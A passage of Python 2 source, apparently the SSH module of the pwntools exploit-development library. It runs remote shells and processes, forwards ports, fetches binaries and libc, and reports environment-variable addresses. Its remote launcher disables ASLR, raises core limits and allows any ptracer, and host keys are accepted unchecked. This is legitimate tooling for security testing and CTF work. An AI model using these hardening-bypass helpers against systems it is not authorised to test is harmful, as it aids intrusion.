process = 'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.sock = tmp_sock
self.wait()
# Again set self.sock to None
self.sock = None
return data
def wait(self):
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode == None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace('\r\n','\n')
cur = cur.replace('\r','')
if cur == None:
continue
elif cur == '\a':
# Ugly hack until term unstands bell characters
continue
sys.stdout.write(cur)
sys.stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
data = sys.stdin.read(1)
if not data:
event.set()
else:
data = [ord(data)]
if data:
try:
self.send(''.join(chr(c) for c in data))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
#: Working directory
cwd = None
#: PID of the process
#: Only valid when instantiated through :meth:`ssh.process`
pid = None
#: Executable of the procesks
#: Only valid when instantiated through :meth:`ssh.process`
executable = None
#: Arguments passed to the process
#: Only valid when instantiated through :meth:`ssh.process`
argv = None
def libs(self):
"""libs() -> dict
Returns a dictionary mapping the address of each loaded library in the
process's address space.
If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
verbatim, which may be different than the actual addresses if ASLR
is enabled.
"""
maps = self.parent.libs(self.executable)
maps_raw = self.parent.cat('/proc/%d/maps' % self.pid)
for lib in maps:
remote_path = lib.split(self.parent.host)[-1]
for line in maps_raw.splitlines():
if line.endswith(remote_path):
address = line.split('-')[0]
maps[lib] = int(address, 16)
break
return maps
@property
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
@property
def elf(self):
"""elf() -> pwnlib.elf.elf.ELF
Returns an ELF file for the executable that launched the process.
"""
import pwnlib.elf.elf
libs = self.parent.libs(self.executable)
for lib in libs:
# Cannot just check "executable in lib", see issue #1047
if lib.endswith(self.executable):
return pwnlib.elf.elf.ELF(lib)
@property
def corefile(self):
import pwnlib.elf.corefile
finder = pwnlib.elf.corefile.CorefileFinder(self)
if not finder.core_path:
self.error("Could not find core file for pid %i" % self.pid)
return pwnlib.elf.corefile.Corefile(finder.core_path)
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable in the remote process.
"""
argv0 = self.argv[0]
script = ';'.join(('from ctypes import *',
'import os',
'libc = CDLL("libc.so.6")',
'print os.path.realpath(%r)' % self.executable,
'print(libc.getenv(%r))' % variable,))
try:
with context.local(log_level='error'):
python = self.parent.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.parent.process([argv0,'-c', script.strip()],
executable=python,
env=self.env,
**kwargs)
path = io.recvline()
address = int(io.recvline())
address -= len(python)
address += len(path)
return int(address) & context.mask
except:
self.exception("Could not look up environment variable %r" % variable)
def _close_msg(self):
# If we never completely started up, just use the parent implementation
if self.executable is None:
return super(ssh_process, self)._close_msg()
self.info('Stopped remote process %r on %s (pid %i)' \
% (os.path.basename(self.executable),
self.host,
self.pid))
class ssh_connecter(sock):
def __init__(self, parent, host, port, *a, **kw):
super(ssh_connecter, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
self.rhost = host
self.rport = port
msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
with self.waitfor(msg) as h:
try:
self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
except Exception as e:
self.exception(e.message)
raise
sockname = self.sock.get_transport().sock.getsockname()
self.lhost = sockname[0]
self.lport = sockname[1]
h.success()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
def __init__(self, parent, bind_address, port, *a, **kw):
super(ssh_listener, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
try:
self.port = parent.transport.request_port_forward(bind_address, port)
except Exception:
h.failure('Failed create a port forwarding')
raise
def accepter():
msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
h = self.waitfor(msg)
try:
self.sock = parent.transport.accept()
parent.transport.cancel_port_forward(bind_address, self.port)
except Exception:
self.sock = None
h.failure()
self.exception('Failed to get a connection')
return
self.rhost, self.rport = self.sock.origin_addr
h.success('Got connection from %s:%d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def wait_for_connection(self):
"""Blocks until a connection has been established."""
_ = self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
return self.sock
else:
return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Working directory (``str``)
cwd = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
def __init__(self, user, host, port = 22, password = None, key = None,
keyfile = None, proxy_command = None, proxy_sock = None,
level = None, cache = True, ssh_agent = False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
NOTE: The proxy_command and proxy_sock arguments is only available if a
fairly new version of paramiko is used."""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cwd = '.'
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
# This is a dirty hack to make my Yubikey shut up.
# If anybody has a problem with this, please open a bug and I'll
# figure out a better workaround.
if not ssh_agent:
os.environ.pop('SSH_AUTH_SOCK', None)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(file(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = (proxy_sock or proxy_command) and True
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
else:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
with context.local(log_level='error'):
def getppid():
import os
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline('echo Hello; exit')
>>> print 'Hello' in sh.recvall()
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=[], raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline('echo Hello; exit')
>>> sh.recvall()
'Hello\n'
>>> s.process(['/bin/echo', '\xff']).recvall()
'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall()
'/bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
'/bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> sh.pid in pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
'/tmp\n'
>>> p = s.process(['python','-c','import os; print os.read(2, 1024)'], stderr=0)
>>> p.send('hello')
>>> p.recv()
'hello\n'
>>> s.process(['/bin/echo', 'hello']).recvall()
'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
''
>>> s.process(['/usr/bin/env'], env={}).recvall()
''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print s.process('false', preexec_fn=uses_globals).recvall().strip() # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: global name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
'hello\n'
"""
if not argv and not executable:
self.error("Must specify argv or executable")
argv = argv or []
aslr = aslr if aslr is not None else context.aslr
if isinstance(argv, (str, unicode)):
argv = [argv]
if not isinstance(argv, (list, tuple)):
self.error('argv must be a list or tuple')
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = ['/bin/sh', '-c'] + argv
# Python doesn't like when an arg in argv contains '\x00'
# -> execve() arg 2 must contain only strings
for i, arg in enumerate(argv):
if '\x00' in arg[:-1]:
self.error('Inappropriate nulls in argv[%i]: %r' % (i, arg))
argv[i] = arg.rstrip('\x00')
# Python also doesn't like when envp contains '\x00'
if env and hasattr(env, 'items'):
for k, v in env.items():
if '\x00' in k[:-1]:
self.error('Inappropriate nulls in environment key %r' % k)
if '\x00' in v[:-1]:
self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
env[k.rstrip('\x00')] = v.rstrip('\x00')
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, str):
self.error("executable / argv[0] must be a string: %r" % executable)
if not isinstance(argv, (list, tuple)):
self.error("argv must be a list or tuple: %r" % argv)
if env is not None and not isinstance(env, dict) and env != os.environ:
self.error("env must be a dict: %r" % env)
if not all(isinstance(s, str) for s in argv):
self.error("argv must only contain strings: %r" % argv)
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python2
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
exe = %(executable)r
argv = %(argv)r
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
os.environ.clear()
os.environ.update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
sys.stdout.write(os.path.realpath(exe) + '\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
close(fd)
elif isinstance(newfd, str):
os.close(fd)
os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
elif isinstance(newfd, int) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
apply(%(func_name)s, %(func_args)r)
os.execve(exe, argv, env)
""" % locals()
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
with self.progress(msg) as h:
script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.local(log_level='error'):
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=self.timeout)
try:
result = safeeval.const(python.recvline())
except Exception:
h.failure("Process creation failed")
self.warn_once('Could not find a Python2 interpreter on %s\n' % self.host \
+ "Use ssh.run() instead of ssh.process()")
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = python.recvuntil('\x00')[:-1]
h.success('pid %i' % python.pid)
if aslr == False and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
"""which(program) -> str
Minor modification to just directly invoking ``which`` on the remote
system which adds the current working directory to the end of ``$PATH``.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> py = s.run('python -i')
>>> _ = py.recvuntil('>>> ')
>>> py.sendline('print 2+2')
>>> py.sendline('exit')
>>> print repr(py.recvline())
'4\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable on the remote
system.
Note:
The exact address will differ based on what other environment
variables are set, as well as argv[0]. In order to ensure that
the path is *exactly* the same, it is recommended to invoke the
process with ``argv=[]``.
"""
script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
with context.local(log_level='error'):
python = self.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.process(['','-c', script.strip()], executable=python, **kwargs)
result = io.recvall()
try:
return int(result) & context.mask
except:
self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print s.run_to_end('echo Hello; exit 17')
('Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
def connect_remote(self, host, port, timeout = Timeout.default):
r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to
using the ``-L`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
Examples:
>>> from pwn import *
>>> l = listen()
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> a = s.connect_remote(s.host, l.lport)
>>> b = l.wait_for_connection()
>>> a.sendline('Hello')
>>> print repr(b.recvline())
'Hello\n'
"""
return ssh_connecter(self, host, port, timeout, level=self.level)
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to
using the ``-R`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
Examples:
>>> from pwn import *
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> l = s.listen_remote()
>>> a = remote(s.host, l.port)
>>> b = l.wait_for_connection()
>>> a.sendline('Hello')
>>> print repr(b.recvline())
'Hello\n'
"""
return ssh_listener(self, bind_address, port, timeout, level=self.level)
listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print s['echo hello']
hello
"""
return self.__getattr__(attr)()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print repr(s('echo hello'))
'hello'
"""
return self.__getattr__(attr)()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.echo('hello')
'hello'
>>> s.whoami()
'travis'
>>> s.echo(['huh','yay','args'])
'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr] + args[0]
else:
command = ' '.join((attr,) + args)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(data)
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace('(stdin)= ','')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace('-','')
return data.strip()
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
def _download_raw(self, remote, local, h):
def update(has, total):
h.status("%s/%s" % (misc.size(has), misc.size(total)))
if self.sftp:
try:
self.sftp.get(remote, local, update)
return
except IOError:
pass
cmd = 'wc -c < ' + sh_string(remote)
total, exitcode = self.run_to_end(cmd)
if exitcode != 0:
h.failure("%r does not exist or is not accessible" % remote)
return
total = int(total)
with context.local(log_level = 'ERROR'):
cmd = 'cat < ' + sh_string(remote)
c = self.run(cmd)
data = ''
while True:
try:
data += c.recv()
except EOFError:
break
update(len(data), total)
result = c.wait()
if result != 0:
h.failure('Could not download file %r (%r)' % (remote, result))
return
with open(local, 'w') as fd:
fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.failure('Could not download file %r' % remote)
return local
